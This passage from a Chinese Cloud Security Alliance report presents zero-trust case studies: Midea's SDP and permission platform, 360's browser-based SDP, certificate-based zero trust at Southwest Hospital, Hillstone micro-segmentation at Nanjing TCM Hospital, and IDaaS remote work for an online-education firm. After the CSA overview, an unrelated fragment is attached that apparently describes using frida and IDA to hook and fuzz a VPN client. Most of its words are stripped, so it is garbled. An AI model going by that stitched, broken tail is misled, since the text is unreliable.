在私有的安全云网络中,最大限度减少互联网暴露面。
2.以身份为中心的访问控制
执行以身份为中心的访问控制策略,通过预认证、预授权的方式,仅允许已
认证和授权的访问源接入叠加网络,并只允许访问已授权的业务。
3.超大规模访问控制策略
基于身份属性的细粒度访问控制策略,安全关口前移,支持超大规模访问控
制策略,同时保持高性能流量转发能力。
4.无隧道,无限制
不建立网络隧道,而是搭建完整的 IPv4 网络,端到端加密传输,可大范围
部署,比 VPN 更安全、更快、更稳定,用户体验更好。
图 2 SDP 架构
“图 3:BPI 架构”是 Midea-BPI-SDP 的解决方案中的 BPI(业权一体化)
实现技术架构图。该架构方案解决了如下问题:
5.大规模运维减负
通过驱动程序进行远程连接与控制,实现大规模服务器端的去插件化。支持
©2021 云安全联盟大中华区-版权所有
114
运维用户自助化的权限申请。提升权限开通效率,同时,实现了用户入转调离的
权限自动化赋予与回收。
6.多样化、碎片化、动态化权限管理能力
以零信任网络安全为基础,强调从不信任,即动态身份认证与动态授权。BPI
(业权一体化)是从权限管理基础设施上带来的企业级业务变革,满足企业多样
化、碎片化、动态化的场景需求而生的权限管理体系,支撑企业落地有限元的极
细粒度授权单元管理与业务场景的动态匹配。
7.远程办公、轻松运维
支持任何环境下开展用户和终端和远程接入,从不信任,始终认证,细粒度
授权和弹性控制。
图 3 BPI 架构
22.2.2 痛点场景
序号
痛点描述
解决方案
1
原有身份管理系统
老旧,界面易用性不高,
不能分级分权管理,并权
限控制粒度较粗,不能控
使用美云智数业权一体化产品,从
功能级到数据级权限控制一步到位,并
且支持不同维度的分级管理,同时,实
现大部分岗位标准权限的自动化开通、
©2021 云安全联盟大中华区-版权所有
115
制到指令级
转移与回收,大大提升管理效率的同时,
降低安全风险。
2
现有十万级服务器
需要大量的运维持续投
入,原有身份管理系统不
能设置定期更新密码策
略,服务器安全存在较大
隐患
使用美云智数业权一体化产品,可
以设置定期更换的复杂密码策略,定期
自动更新,实现管理大规模应用服务器
密码的自动维护
3
原有身份管理系统
管理不同类型服务器,都
需要在每台机器上安装
插件且不稳定,造成运维
工作量较大提升
使用美云智数业权一体化产品,干
掉各类型服务器端安装的客制化插件,
使用连接器驱动管理服务器资源与细粒
度权限资源
4
原有网络环境下,运
维工作只能在物理办公
网络进行,出现紧急情况
时,故障恢复效率不高
使用美云智数零信任网络平台(信
域安全云网)构建一个全网互联的云端
办公网络,基于软件定义网络 SDP 基础
架构实现远程办公安全协同与可信互联
22.3 优势特点和应用价值 I 架构办公问题
22.3.1 优势特点
本研究成果主要目标市场为全国中大型企业资源安全访问控制,解决传统模
式下的资源统一管理难、分级管控难、安全能力不足、效率低下等问题,提供了
一套满足企业多业务场景的业权一体与零信任安全运维的解决总体方案(即“既
要守前门,也要守后门”的双重安全加固),是保障企业数字化转型下的基础设
施安全的必要部分,具有巨大的市场空间和广阔的市场前景。
©2021 云安全联盟大中华区-版权所有
116
22.3.2 应用价值
随着企业数字化转型步入深水区,以及国家在信息安全监管方面的力度加强,
安全边界越来越模糊,基于业权一体化的零信任安全应用方案(即“既要守前门,
也要守后门”的双重安全加固),将在各大企业中具有非常广的应用前景。
22.4 经验总结
22.4.1 经验总结
经过本项目的实践,总结出如下的经验:
创新点一:业权一体化产品的高效实践方法论
创新点二:远程办公、轻松运维
创新点三:无边界的端到端加密私有安全网络
22.4.2 效果反馈
经过本项目的实施,真正做到网络层可控、授权层可管的细粒度高效运维。
效果截图如下:
图 4
©2021 云安全联盟大中华区-版权所有
117
23、360 零信任架构的业务访问安全案例
23.1 方案背景
某公司是国家高新技术企业,主要从事复合材料与环保建材的研制、开发、
生产、销售等,产品广泛用于房地产开发、旧城改造、民用建筑、工业厂房建设、
室内外装修、城市公用配套设施等领域。秉承"善用资源,服务建设"的理念,坚
持科学发展、和谐建设,经过十多年的发展历程,在国内外拥有多家合资合作公
司,享有自营进出口权,是中国民用复合材料行业的领军企业。
随着该企业的数字化转型,同时业务也开始扩展到国内多个城市,分支机构
对业务的访问和安全需求随之而来。同时,疫情导致的远程办公常态化,诸多内
部员工采用远程访问的方式进行业务操作。
在此背景下,给该企业安全带来了双重挑战:
挑战 1:业务和数据的访问者超出了企业的传统边界。分支机构散布全国,
网络、人员、设备都无法精确识别与控制
挑战 2:企业的业务和数据也超出了企业的认知边界。数据流向安全管理人
员无法控制的范围
23.2 方案概述和应用场景
以 360 连接云软件定义边界系统为核心,基于零信任架构,遵循零信任核心
理念。包含环境感知、可信控制器、可信代理网关三大组件,具备以身份为基础、
最小权限访问、业务隐藏、终端监测评估、动态授权控制等几大核心能力。实现
企业终端统一管理、用户统一管理、应用统一管理、策略统一管理、数据统一管
理、安全统一管理。
©2021 云安全联盟大中华区-版权所有
118
图 1
23.3 优势特点和应用价值
23.3.1 方案效果
1. 企业用户终端只能通过 360 安全浏览器进行身份认证,满足企业“轻办
公”入口需求;
2.浏览器携带用户身份通过可信网关进行认证并建立国密数据通道;
3.可信网关根据用户权限鉴别开放其身份可见的业务系统;
4.用户浏览业务系统文件时实现了防复制、防截屏、防打印、防下载等数据
安全能力;
23.3.2 方案价值
1.安全
1)端口隐藏,减少攻击暴露面;
2)国密数据通道加持,安全可靠;
©2021 云安全联盟大中华区-版权所有
119
3)持续感知动态鉴权,及时发现风险并有效抑制;
4)数据不落地有效防止人为泄露;
2.高效
1)全面支持 SSO 单点登录,无需反复认证;
2)不改变用户使用习惯,打破无形的技术门槛;
3)统一用户访问入口,规范用户访问行为;
23.4 经验总结
零信任的环境感知持续评估对后期运维带来挑战:客户原有 VPN 用户认证成
功后后续再无安全动作,零信任强调的持续感知会要求对访问终端的环境进行持
续的评估,发现安全风险后可动态对访问进行干预,这导致刚开始推广时,运维
管理员接到不少用户咨询访问被干预的原因。建议在落地前整理对应问题解决
FAQ,并通过企业内部统一 IT 工作流进行问题上报/跟踪/处理整体流程。
24、数字认证零信任安全架构在陆军军医大
学第一附属医院的应用
24.1 方案背景
陆军军医大学第一附属医院又名西南医院,是一所现代化综合性“三级甲等”
医院。近年来随着远程问诊、互联网医疗等新型服务模式的不断丰富,医院业务
相关人员、设备和数据的流动性增强。网络边界逐渐模糊化,导致攻击平面不断
扩大。医院信息化系统已经呈现出越来越明显的“零信任”化趋势。零信任时代
下的医院信息化系统,需要为这些不同类型的人员、设备提供统一的可信身份服
务,作为业务应用安全、设备接入安全、数据传输安全的信任基础。
©2021 云安全联盟大中华区-版权所有
120
24.2 方案概述和应用场景
24.2.1 方案概述
本方案主要建设目标是为西南医院内外网建立一套基于“可信身份接入、可
信身份评估、以软件定义边界”的零信任安全体系,实现医院可信内部/外部人
员、可信终端设备、可信接入环境、资源权限安全。全面打破原有的内外网边界
使得业务交互更加便利,医疗网络更加开放、安全、便捷,为医院全内外网业务
协作提供安全网络环境保障。
根据对西南医院安全现状和需求分析,采用基于零信任安全架构的身份安全
解决方案,为医院构建零信任体系化的安全访问控制,满足医院内外部资源安全
可信诉求。总体架构设计如下:
图 1 西南医院总体架构设计图
面向互联网医疗的应用场景,通过与可信终端安全引擎、零信任访问控制区
结合,为医院设备、医护人员和应用提供动态访问控制、持续认证、全流程传输
加密。
24.2.2 陆军军医大学第一附属医院零信任安全架构主要构
成
1.终端安全引擎
在院内外公共主机、笔记本电脑、医疗移动设备等终端设备中,安装可信终
©2021 云安全联盟大中华区-版权所有
121
端安全引擎,由统一身份认证系统与院内资产管理系统对接,签发设备身份证书。
医院用户访问院内资源时,首先进行设备认证,确定设备信息和运行环境的可信,
通过认证后接入院内网络环境,自动跳转到用户身份认证服务。
院内资源访问过程中,引擎自动进行设备环境的信息收集、安全状态上报、
阻止异常访问等功能,通过收集终端信息,上报访问环境的安全状态,建立“医
护人员+医疗设备+设备环境”可信访问模型。
2.零信任安全网关
为避免攻击者直接发现和攻击端口,在医院 DMZ 区部署零信任安全认证网关,
提供对外访问的唯一入口,采用先认证后访问的方式,把 HIS、LIS、PACS 等临
床应用系统隐藏在零信任网关后面,减少应用暴露面,从而减少安全漏洞、入侵
攻击、勒索病毒等传统安全威胁攻击面。
零信任安全网关与可信终端建立 SSL 网络传输数据加密通道,提供零信任全
流程可信安全支撑(代码签名、国密 SSL 安全通信、密码应用服务等),确保通
信双方数据的机密性、完整性,防止数据被监听获取,保证数据隐私安全。
3.安全控制中心
安全控制中心分为访问策略评估服务和统一身份认证服务两个部分。统一身
份认证模块对接入的医院用户、医疗终端设备、医疗应用资源、访问策略进行集
中化管理。访问策略评估服务对医院用户账号、终端、资源接入进行访问策略进
行评估和管理,并对接入医院用户和医疗设备进行角色授权与验证,实现基于院
内用户及设备的基础属性信息以及登录时间、登录位置、网络等环境属性做细粒
度授权,基于风险评估和分析,提供场景和风险感知的动态授权,并持续进行身
份和被访问资源的权限认证。
4.安全基础设施中心
本零安全基础设施中心分为证书服务模块和签名服务模块两个部分。证书服
务模块主要是针对医院用户、医疗终端设备进行证书签发,保证用户和设备的合
法性。签名服务模块主要针对安全控制中心和零信任网关在传输、存储过程中的
数据进行签名操作,保证数据的完整性、可追溯以及抗抵赖性。
©2021 云安全联盟大中华区-版权所有
122
24.3 优势特点和应用价值
24.3.1 应用价值
1.用户管理方面价值
解决医院当前面对医疗访问群体多样化的问题,建立统一的身份管理,减轻
了运维成本。
2.设备管理方面价值
将医疗设备进了统一管理,保障了设备接入的安全管控,对接入设备进行了
有效的身份鉴别。
3.权限管控价值
1)隐藏医疗应用系统,无权限用户不可视也无法连接;对有权限的业务系
统可连接但无法知悉真实应用地址,减少黑客攻击暴露面。
2)以访问者身份为基础进行最小化按需授权,避免权限滥用。
4.访问安全价值
1)采用了“用户+设备+环境”多重认证方式,即保证了认证的安全,还不
影响用户使用体验。
2)通过感知环境状态,进行持续认证,随时自动处理各种突发安全风险,
时刻防护医院业务系统。
5.数据安全价值
1)进行了全链路信道安全,消除了医疗数据传输安全风险。
2)对患者数据进行了隐私保护,解决了数据内部泄露问题。
24.3.2 优势特点
1.围绕设备证书建立设备信任体系
在传统数字证书框架中,增加针对设备信任的评估环节,以设备证书作为零
信任安全体系的基石。
2.自动化授权体系
零信任访问控制区建立的一整套自动化授权体系,可根据用户属性、用户行
©2021 云安全联盟大中华区-版权所有
123
为、终端环境、访问流量等多维度数据,自动对用户权限进行实时变更,从而保
障内部系统安全性。
3.基于设备信任最小化攻击平面
在任何网络连接建立时,首先进行设备认证,能够有效阻止非法设备的连接、
嗅探、漏洞扫描等恶意行为,既能最小化系统的暴露平面,又可以灵活适应一人
多设备、多人共用设备、物联网设备等不同场景。
4.以信任的持续评估驱动用户认证
通过信任的持续评估驱动认证机制的动态调整,根据动态的信任评估结果反
馈调整用户认证机制。
5.海量的应用加密通道支撑
逻辑虚拟化技术的深入推进,支持海量的应用加密通道。
通过 SSL 多实例技术,实现同一台设备上支持多个 SSL 服务,实例之间通过
密码卡实现密钥物理隔离。
基于高性能网络协议栈,实现海量的 TCP/SSL 连接支持,通过算法和代码流
程的优化,不断提高每秒新建连接数。
吞吐率、并发连接数和每秒新建连接数等网关指标做到业界领先
24.4 经验总结
在项目的实施阶段,首先要明确医疗内部和外部的访问者身份,实现医院人
员的统一身份管理。在此阶段,需要对内外部用户身份目录进行梳理,由于医院
系统用户涉及医生、患者、临聘人员、其他医疗机构人员等多方用户,所以需要
整合多部门的用户信息,保证用户信息的实时性、同步性和一致性。另外,由于
医院业务系统数据存储方式多样,项目组根据不同业务系统数据结构编写了大量
针对性的数据清洗脚本,进行身份数据统一收集、清洗、整理、加密。
其次,对医院信息科进行调研,将需要接入医院网络进行应用数据传输的医
疗终端及手持设备,如:PC、智能手机、平板以及患者随身佩戴的小型监测设备
等物联网设备信息收集汇总和统一管理。由于医院没有资产管理系统,未对设备
进行统一管理,为此数字认证临时开发了一套在线设备信任凭证在线签发系统,
自助采集设备基本信息、自助签发下载设备信任凭证。另外,在集成可信终端安
©2021 云安全联盟大中华区-版权所有
124
全引擎和终端模块前,针对医院各类终端存在时间跨度久且种类繁多的特点,在
各类、各版本操作系统进行多次软件兼容性测试等工作,解决与医院各类终端适
配问题。
然后,集成医院现有的各类业务系统,接入零信任网关,通过 API 代理统一
对外提供服务。医院物理场所开放、网络多样,各类网络基础设施的物理安全无
法统一保障,在院内各医疗服务网络出口前端部署应用安全网关后,为传输的业
务数据进行加密保护,有效防止攻击者窃取、篡改、插入或删除敏感数据。
最后,通过分析医院的访问需求,制定可信的安全策略,管控访问内容和访
问权限。在可信身份服务的基础上综合评估设备安全风险、访问行为频率、以及
发生访问请求的时间地点等因素,进行持续风险评估和动态授权,保障各项医疗
服务被医院各类用户同时访问的安全性。在制定安全策略时,遵循“动态最小权
限”原则,结合医院实际业务需求,通细粒度的动态访问控制,应对医院诊疗业
务中的精细化安全管理风险。
25、山石网科南京市中医院云数据中心“零
信任”建设项目成功案例
南京市中医院成立于 1956 年,是南京中医药大学附属南京中医院、南京市
中医药研究所、全国肛肠医疗中心、国家级区域诊疗中心;医院现占地面积 92
亩,建筑面积 31.1 万㎡,编制床位 1500 张;在职职工 1900 人,其中硕博士 456
人,高级职称卫技人员 423 人,是一所中医特色明显,集医疗、教学、科研、预
防保健、康复和急救功能为一体的、具有中国传统文化特色的花园式、现代化大
型三级甲等中医院。
医院现有 1 个主院区(大明路院区)和 1 个分院区(城南分院),2019、2020
年分别新增两个紧密合作型医联体:浦口分院(浦口区中医院)、高淳分院(高
淳中医院),2021 年 4 月新增一个市外紧密合作型医联体:滨海分院(盐城市滨
海县中医院)。有全国老中医药专家学术经验继承工作指导老师 5 人,江苏省名
中医 10 人,江苏省名中西医结合专家 4 人,南京市名中医 37 人,南京市名中西
©2021 云安全联盟大中华区-版权所有
125
医结合专家 2 人,秦淮区名中医 12 人;有全国名老中医工作室 5 个,省级名中
医工作室 3 个,市级名中医工作室 27 个。
医院科室设置完善,现有国家级重点学科 1 个(中医肛肠病学)、重点专科
7 个,省级重点学科 1 个(中医脑病学)、重点专科 8 个,市级重点专科 14 个,
市级重点专科建设单位 2 个。肛肠中心为国家级区域诊疗中心、部省共建中医肛
肠疾病临床医学研究中心。医院设立院士工作站、江苏省研究生工作站、江苏省
博士后创新实践基地、南京市中医药现代化与大数据研究中心、南京市中医药转
化医学基地、南京市普外科临床医学中心、南京市医学重点实验室、南京市临床
生物资源样本库等。
医院拥有院内自制制剂 122 种。拥有国家级非物质文化遗产代表性项目:丁
氏痔科医术;江苏省非物质文化遗产项目:“洪氏眼科”“金陵中医推拿术”;
与多名国医大师、国医名师达成合作协议;与美国、比利时等多所大学开展院校
间科研、教学、人才培养全面合作。在全国率先创立多专业一体化诊疗平台,并
作为典范向全国推广建设经验。
抗疫期间,医院涌现出一批先进工作者,先后有 4 人次荣获全国抗击新冠肺
炎疫情先进个人和全国优秀共产党员等国家级荣誉,20 人次荣获省抗疫先进个
人、省百名医德之星等省级荣誉,42 人次荣获市优秀共产党员、市五一劳动奖
章、人民满意的卫生健康工作者等市级荣誉。2020 年,肛肠科被评为“2020 届
中国中医医院最佳临床型专科”。顾晓松院士工作站经批复成为江苏省级院士工
作站。医院顺利通过“三级中医医院复核评审”,通过医院信息“互联互通标准
化成熟度四级甲等测评”,摘得 2020 年度“全国医院质量管理案例奖·卓越
奖”。
25.1 方案背景
2017 年 6 月实行的《中华人民共和国网络安全法》,第二十一条明确要求:
国家实行网络安全等级保护制度。而针对医疗卫生行业,卫生部早于 2011 年分
别发布《卫生部办公厅关于全面开展卫生行业信息安全等级保护工作的通知》和
《卫生行业信息安全等级保护工作的指导意见》,明确要求全国所有三甲医院核
心业务信息系统的安全保护等级原则上不低于三级;2016 年,国家卫健委《2016
©2021 云安全联盟大中华区-版权所有
126
三级综合医院评审标准考评办法 ( 完整版 )》规定了医院的重要业务系统必须
达到信息安全等级保护三级标准才满足三级医院评审标准中对于网络安全的要
求。
医疗行业越来越多的业务系统比如:HIS、LIS、PACS 等迁移至虚拟化平台
中运行,但是安全建设依然沿用之前的传统安全解决方案来应对当前主流的安全
威胁。在云环境中,传统安全的解决方案会造成云内安全的空白,从而影响将关
键业务应用转移至灵活低成本云环境的信心,同时业务系统面临的安全威胁也越
发凸显。南京市中医院于 2020 年启动了《云数据中心“零信任”建设项目》,对
于南京市中医院虚拟化环境,虽然外部部署了入侵防御设施,但依然存在上述的
情况。因为传统的安全模型仅仅关注组织边界的网络安全防护,认为外部网络不
可信,内部网络是可以信任的,遵循“通过认证即被信任”。一旦绕过或攻破边
界防护,将会造成不可估量的后果。零信任安全模型理念,改变了仅仅在边界进
行防护的思路,把“通过认证即被信任”变为“通过认证、也不信任”。即任何
人访问任何数据的时候都是不被信任的,都是受控的,都是最低授权的,同时还
将记录所有的访问行为,做到全程可视。
微隔离技术,是 SDDC(软件定义数据中心)、SDS(软件定义安全)的最终
产物。当微隔离技术与 NFV 相结合,配合 Intel DPDK 技术的高速发展,这与零
信任安全模型的思路完全契合。在业界诸多领先厂商的不断努力下,我们看到在
云计算环境中微隔离产品是零信任安全模型的最佳实践。
25.2 方案概述和应用场景
25.2.1 方案概述
山石网科为用户带来“零信任”安全模型的最佳实践方案,基于 SDN 的网络
微隔离可视化方案—山石云·格。山石云·格在云计算环境中真正实现了零信任
安全模型,精细化按云内核心资产进行管理,可以将用户虚机的不同角色划定不
同的安全域。山石云·格更能做到 L2-L7 层的最低授权控制策略,且全面适配
IPv6 环境。 凭借山石网科十多年来在应用识别、入侵防御、网络防病毒、Web
访问控制的积累,不论是借用 80 端口的 CC 攻击,还是隐藏在文件中的“病毒”
©2021 云安全联盟大中华区-版权所有
127
都会被发现、阻断!
南京市中医院采用山石云·格方案分别部署在医院外网(前置服务区)和办
公区域(内网区)。
图 1 用户数据中心网络拓扑
医院外网虚拟化数据中心,山石云·格部署在 VMware-vSphere(非 NSX)环
境内,为医院官方网站、移动支付、院感系统等应用提供 L2-L7 层安全防护及业
务隔离能力。办公区域虚拟化数据中心内部,山石云·格部署在 VMware- NSX
环境内,通过 NSX 服务编排方式引流,山石云·格提供了灵活的策略编排,详细
的云内流量展示以及入侵防御和防病毒功能,加固了整套虚拟化数据中心的安全
能力。
25.2.2 微隔离技术的实践
南京市中医院的云数据中心中运行的众多应用,分别由不同的供应商开发并
维护对应的系统,不同应用系统之间有一定的服务调用,在安全方面,在整个教
据中心的外侧边界采用了下一代防火墙、IPS 等设备进行防护,并做了基本的管
理、应用系统的网络划分。由于配置难度、保证系统快速上线和应用迭代等原因,
云内未划分更多安全城。为了业务快速开发、迭代和互相调用,采用了大二层组
网的方式。系统存在的最大风险是,不同外包开发商引入的安全风险,如关键数
据的泄瀚,或是外包人员以报复社会为目的的恶意攻击。
在帮助用户采用微隔离技术实现零信任安全模型时,微隔离技术的使用也是
©2021 云安全联盟大中华区-版权所有
128
遵循 ISO 27001 标准中的 PDCA 循环,即 Plan(计划)、Do(实施)、Check(检查) 、
Act(措施)实现的。
1.明确云内核心资产,是实现零信任安全模型的基础,从内向外设计网络,
划分安全域的第一步。在 PDCA 的循环中,这是一个动态的过程,不要奢望一劳
永逸。!我们一步步围绕,现有以及未来增加的数据,计算核心资产,来划分 MCAP
进行防护,即使采用了 NFV 技术,但在进行深度安全防护时,计算资源依旧宝贵、
稀缺、按需对虚机进行防护才是正确的方式,做好这一步有利于将“好钢用在刀
刃”上。
图 2 采用全分布式架构的微隔离方案
2.学习和可视。建议初期,我们采用旁路虚拟网络流量到山石云·格,也可
以暂时设为全通策略。每次学习和可视的周期最好大于正常的业务周期。利用山
石云·格的可视化能力,刻画云内虚机之间的通信轨迹,有哪些应用、有没有威
胁。对各个应用系统之间数据和服务交互情况,云内威胁情况.管理员会有个实
际的认识。
©2021 云安全联盟大中华区-版权所有
129
图 3 云平台全局流量可视
3.确定低授权策略。根据学习可视阶段的成果。可以制定接下来的防护策略。
比如 MCAP 如何划分,MCAP 间全局的访问控制策略和一些已知高危漏洞的防护
策略 … …
MCAP 的划分可以有多种方式,比如说按照应用的部门进行划分。也可以按
照一类虚机进行防护,把一类虚机作为高危资源,设定防护策略。
图 4 按照虚机身份自由划分微安全域
在这些防护策略的制定上,除了在山石云·格上进行相关防护外.也可以结
合外部的下一代防火墙一同进行协调配合。比如在外部防火墙上可以对不同的外
包服务商设定 VPN 账号,将该账号与可访问内部虚机进行限定。同时对不同外包
供应商负责的虚机,分别再划分 MCAP,设定最低授权策略。
到下一个 PDCA 周期的时候,安全管理员可以将外包供应商登陆 VPN 的情况,
山石云·格可以行到的 MCAP 内部,MCAP 之间通信情况、威胁情况,在统一的时
©2021 云安全联盟大中华区-版权所有
130
间维度上进行分析。借助山石云·格的策略助手,可以学习 MCAP 需要配置的安
全策略,并邀请主机管理员、应用开发人员一起,循序渐进,设定好每个 MACP
的最低授权策略,避免错误设,也避免不敢设置导致的漏洞。
图 5 多维度立体的安全域划分,实现最低授权访问
4.制定实施的计划。协调相关部门进行防护的实施。
微隔离技术在初次实施部署时,由于涉及到一些计算资源和网络资源,需要
网络安全部门和系统部门进行细致的协调配合,确定最佳的上线时间和协调相关
的资源。
在系统上线之后,虽然微隔离技术大量采用了 SDDC / SDS《软件定义数据
中心/软件定义安全》 ,大大提升了生产力,只需要轻点鼠标就能完成相关安
全防护工作。但是,最好有明确实施计划和细节。在应用、系统部门进行通告和
协调、避免可能带来的业务风险。
同时微隔离产品的设计初衷,并不是让操作者在一个协作团队中成为“上帝”,
我们希望可视化的效果能够成为多个部门良好协作的“契约”!
5.实施。
实施之后,将会回到第一和第二步,一方面检查策略是否实施有效,另外是
重新新审视内部情况,制定下一步的行动计划.我们建议采用一个循序渐进的思
路,在云内实现零信任安全模型。
©2021 云安全联盟大中华区-版权所有
131
图 6 持续监控
25.3 优势特点和应用价值
大多数的数据泄漏事件是突破了边界防护,利用内部防护、管理的漏洞达成。
零信任安全模型,提出了一个安全防护的新思路。微隔离技术不仅让云计算中可
以实现零信任安全模型,同时也是零信任安全模型提出以来获得的最佳实践,微
隔离技术可以实现:
1.从内到外设计网络,安全融入网络 DNA
2.更精准的最低授权策略
3.更清晰的流量、威胁可视化
4.更高的性能和可扩展性
5.更高的安全生产力
25.4 经验总结
在本次的案例中 VMware NSX 和山石云·格配合在云中实现零信任安全模型,
通过多个 PDCA 循环实现最优化配置的。
初期通过明确核心资产发现,各种业务网络是多个核心数据资产,情况不清
晰,且还有细化的空间。
南京市中医院的云数据中心面临的最大挑战是内部不可视,特别是虚机间、
应用系统间交互关系不清楚;这些系统间跑哪些应用,使用哪些已知端口或自定
义端口不清楚;网络通信中是否有攻击有违规应用,也不清楚。不可视带来的难
题是,想实现微隔离,核心资产及其安全域的边界不明晰;不清楚跑哪些应用,
调用哪些端口号,无法确定最低授权策略……
整体需要经历多个 PDCA 循环,完成 NSX 和山石云·格的部署,安全域的划
©2021 云安全联盟大中华区-版权所有
132
分和调整,最低授权策略的部署和调整优化。在多个 PDCA 循环过程中,分两个
大的阶段实施:
第一阶段目标是“明确”。利用山石云·格的可视和学习,明确资产、最低
授权策略。可以充分利用山石云·格的“透视镜”、“策略助手”等功能。NSX 向
山石云•格的引流策略可以较粗,或者选择分区域抽样引流。山石云•格具备云内
资产发现功能,配合山石云•格的多维度过滤功能,网络管理员可以区分哪些流
量来自云数据中心之外,哪些是内部但未防护的区域。在这一阶段中,既可以勾
勒出云内不同业务系统、租户间网络交互的情况,也能及时发现并阻断威胁。
第二阶段目标是优化。逐步将一些经过验证,可以由 NSX 完成 L2-L4 层访问
控制策略从山石云·格上转移到 NSX 上实施,山石云·格则集中在一些 L5-L7
层的安全防护上,实现性能、全面防护的有效结合。
26、九州云腾科技有限公司某知名在线教育
企业远程办公零信任解决方案
26.1 方案背景
2020 年,突发疫情,企业纷纷开启远程办公模式。
对在线教育企业来说,则面临着更加严峻的挑战。大量学生,“停课不停学”,
更加频繁的通过在线教育平台进行学习,企业的业务比非疫情期间还要繁忙。
某知名在线教育企业,数万员工集体远程办公,超过二十万台设备接入企业
内网,企业面临着诸多的安全挑战:
1.大量员工远程办公,缺少有效的安全管控体系,存在数据泄漏风险;
2.有 20 多个应用,包括本地部署应用和 SaaS 应用。员工远程办公,通过公
网在多个系统间切换,重复登录验证体验差。弱口令、重复口令,存在着巨大的
安全隐患;
3.大量使用 iPad 移动终端授课,现有的 IT 方案,无法自动识别并进行有
效管理;
©2021 云安全联盟大中华区-版权所有
133
4.员工数量众多,安全力量有限,员工入职、调岗、离职权限管理压力巨大,
稍有不慎,则会带来巨大的安全隐患;
5.如何在最短的时间内,以最小的改动,满足疫情下的远程办公需求,兼顾
安全与效率,是该企业必须全盘考虑的问题。
九州云腾远程办公零信任解决方案,以身份认证为基石,通过细粒度的动态
的身份验证及授权,确保仅有授权的用户可以访问授权的业务。丰富的应用模块,
可快速对接各类企业应用,实现系统的快速上线,满足企业需求。
另一方面,九州云腾丰富的超大规模客户经验,可轻松应对各类场景下的大
规模访问及认证请求。良好的扩展性,为企业零信任战略的推进,提供坚实的身
份基础。
26.2 方案概述和应用场景
九州云腾远程办公零信任解决方案,以可信、动态为核心,经过可信认证体
系的 IP、设备、应用,在进入办公网络进行权限获取和数据调用时,凭借可信
认证获取权限,实现动态安全检测防护。
图 1 零信任远程办公方案
1. 远程终端安全管理
提供终端的可信认证以及身份管理,通过认证才能访问内部系统。同时采集
分析终端安全数据,实时而非静态的判断入网设备的安全性。客户网络直播课程
中,为保证网络传输速度,提出了需要通过有线网络连接大规模大批量使用 iPad
©2021 云安全联盟大中华区-版权所有
134
的终端资产管理和网络安全需求,解决方案通过控制入网组网,实现了对移动设
备转接头入网情况的突破性识别,同时监控设备状态,针对设备可能出现的异常
状态做好动态分级的权限管理,结合终端安全检测与杀毒,实现全生态的移动设
备管理。
2. 云端动态决策管控
多因素强认证,采用包括人脸识别、指纹识别、人声识别、动态二维码、手
机短信、令牌等交叉安全认证方式来提升整个身份认证的强度。并以智能模型分
析可信验证结果,综合判断访问身份的可信等级,实现用户权限的动态分配。例
如:若某位员工偏离了日常登录地址,突然有一天显示海外登录,那么系统就会
给出不同的身份认证,匹配不同的访问权限。
3. 统一可信网络
通过 IDaaS 产品打通了不同应用系统间的账户认证和授权体系,通过智能管
理中心和多种安全管控节点,实现集中权限管理以及全面审计能力,使企业的所
有应用系统可信接入办公网络,帮助企业提升安全性与便利性。
4. 动态最小授权
对进入系统的任何人和动作进行持续的安全监控和审计,无需配置内网准入
和 VPN,使用公网即可接入办公网络,避免了繁琐配置和技术本身限制带来的网
络延迟。
九州云腾远程办公零信任解决方案,通过 IDaaS 打通所有的员工和应用,并
通过安装在设备上的客户端,实现终端的安全检查,通过可信身份、可信设备、
可信网络、可信应用、可信链路,构建零信任可信远程办公体系,让员工随时随
地安全接入内部业务,在安全和效率之间达到最佳的平衡。
26.3 优势特点和应用价值
九州云腾远程办公零信任解决方案,在不改变客户原有网络架构的基础上,
快速实现大规模的远程办公部署:
1.自动覆盖所有员工,联动管理
基于 IDaaS 平台的集中式身份管理服务,为客户建立统一身份管理中心,基
于设备和人的绑定关系,批量覆盖所有员工的联动管理,确保员工所有访问行为
©2021 云安全联盟大中华区-版权所有
135
的可视、可管、可审。
2.跨应用免验证高速切换提升体验
IDaaS 平台内预置了多种模板应用,同时平台自带开发者服务功能模块,可
快速与企业的各类应用对接,实现对各种业务的统一免密验证登录,员工在应用
之间无缝切换。并结合上网行为管理和终端数据防泄漏能力,确保落地数据安全。
3.持续监控确保全链路可信
分段、隔离和控制网络的能力,仍然是零信任网络安全的关键点,九州云腾
远程办公零信任策略组合利用了多种现有技术和方法,以持续的访问控制、安全
监控和审计,帮助客户实现远程访问过程中网络链路的可信。
4.分布式微服务设计,高性能,易扩展
分布式微服务设计,支持快速水平扩展,在系统访问量波峰波谷时段,都能
保持一致的性能,满足各类突发场景下的需求。
26.4 经验总结
突发疫情,需要在极短的时间内,快速完成对接,实现数万员工的无感接入,
因此采用了最小集合的解决方案,通过可信终端+可信身份实现安全远程办公。
而这也刚好符合了企业推进零信任战略的逻辑,零信任不是部署一个统一身
份认证,或一套 SDP,而是一套全新的安全理念和架构,需要基于企业的特点,
进行持续的升级改造,循序渐进的构建与业务需求匹配的安全又高效的信息安全
体系。
©2021 云安全联盟大中华区-版权所有
136
四、关于 CSA 大中华区
云安全联盟 CSA 于 2009 年正式成立,是全球中立权威的非营利产业组织,
旨在为推广云计算和新兴数字技术提供安全保障的最佳实践,并致力于国际云计
算安全和下一代数字技术安全前沿研究和全面发展,研究领域包括云安全、数据
安全、零信任、区块链安全、物联网安全、人工智能安全、个人信息保护与隐私
安全、云应用安全、5G 安全、工业互联网安全、量子安全等。CSA 目前在全球设
立四大区,包括美洲区、欧非区、亚太区和大中华区,全球会员共有 600 多家及
6000 多名国际高级专家。
云安全联盟大中华区( Cloud Security Alliance Greater China Region,
“CSA GCR”)于 2016 年在香港注册成立,并在中国上海注册上海代表处,聚焦
信息技术领域的基础标准和安全标准研究及产业最佳实践,牵引与推动国家及国
际标准的接轨,打造国际标准、技术联接器与沟通桥梁,开展业务的地域范围覆
盖中国(含港澳台)、俄罗斯、蒙古国、哈沙克斯坦、吉尔吉斯坦、乌兹别克斯
坦等欧亚国家。
CSA GCR 在中国的成员单位包括中国信通院、华为、中兴、腾讯、浪潮、OPPO、
顺丰科技、深信服、360 集团、奇安信、绿盟科技、启明星辰、安恒信息、天融
信、工商银行、国家电网、数字认证、金山云、金蝶、海尔集团、中国银联、中
国科学院云计算中心、北京大学等 160 多家机构,个人会员近 2 万人,已成为构
建中国数字安全生态的重要力量。 | pdf |
⸺frida
0x00
443flagssl
IDAIDAVPN
443
0x01
Atrust
frida
idapwnLinuxfrida
idakpi
pwn
“”
frida
1. webvpn
2.
ida
3. hook
fridavpnhookfuzz
0x02
fridafridafrida
apkapkapkfridaobjection
Linuxmacwindowshookfridafridahook
fridahook
